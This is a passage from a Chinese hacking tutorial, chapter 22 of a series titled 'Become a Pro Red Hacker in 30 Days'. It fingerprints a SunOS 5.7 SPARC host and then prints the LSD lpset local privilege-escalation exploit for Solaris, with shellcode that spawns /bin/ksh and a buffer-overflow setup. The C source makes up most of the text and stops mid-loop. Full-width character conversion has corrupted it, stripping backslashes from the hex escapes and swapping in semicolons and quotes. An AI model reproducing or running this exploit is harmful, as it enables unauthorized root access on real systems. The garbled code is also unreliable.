30天打造专业红客-第22章

按键盘上方向键 ← 或 → 可快速上下翻页，按键盘上的 Enter 键可回到本书目录页，按键盘上方向键 ↑ 可回到本页顶部！
————未阅读完？加入书签已便下次继续阅读！


　　　　SunOS　mars　5。7：SunOS的版本。
　　　　sparc：服务器版本。
　　　　Generic_106541…08：补丁情况。
　　　　　
　　　　找到exploit：lpset。c
　　　　cat　》lpst。c
　　　　/*##　copyright　LAST　STAGE　OF　DELIRIUM　apr　2000　poland　　*：//lsd…pl/　#*/
　　　　/*##　/usr/bin/lpset　#*/
　　　　#define　NOPNUM　864
　　　　#define　ADRNUM　132
　　　　#define　ALLIGN　3
　　　　char　shellcode＇＇=
　　　　　〃x20xbfxffxff〃　　/*　bn；a　　　*/
　　　　　〃x20xbfxffxff〃　　/*　bn；a　　*/
　　　　　〃x7fxffxffxff〃　　/*　call　　　*/
　　　　　〃x90x03xe0x20〃　　/*　add　　％o7；32；％o0　　*/
　　　　　〃x92x02x20x10〃　　/*　add　　％o0；16；％o1　　*/
　　　　　〃xc0x22x20x08〃　　/*　st％g0；＇％o0＋8＇　*/
　　　　　〃xd0x22x20x10〃　　/*　st％o0；＇％o0＋16＇*/
　　　　　〃xc0x22x20x14〃　　/*　st％g0；＇％o0＋20＇*/
　　　　　〃x82x10x20x0b〃　　/*　mov　　0xb；％g1　　*/
　　　　　〃x91xd0x20x08〃　　/*　ta8　　*/
　　　　　〃/bin/ksh〃
　　　　；
　　　　char　jump＇＇=
　　　　　〃x81xc3xe0x08〃　　/*　jmp　　％o7＋8　*/
　　　　　〃x90x10x00x0e〃　　/*　mov　　％sp；％o0　　*/
　　　　；
　　　　static　char　nop＇＇=〃x80x1cx40x11〃；
　　　　main（int　argc；char　**argv）｛
　　　　　char　buffer＇10000＇；adr＇4＇；*b；
　　　　　int　i；
　　　　　printf（〃copyright　LAST　STAGE　OF　DELIRIUM　apr　2000　poland　　//lsd…pl/n〃）；
　　　　　printf（〃/usr/bin/lpset　for　solaris　2。6　2。7　sparcnn〃）；
　　　　　*（（unsigned　long*）adr）=（*（unsigned　long（*）（））jump）（）＋10088＋400；
　　　　　b=buffer；
　　　　　sprintf（b；〃***=〃）；
　　　　　b＋=4；
　　　　　for（i=0；i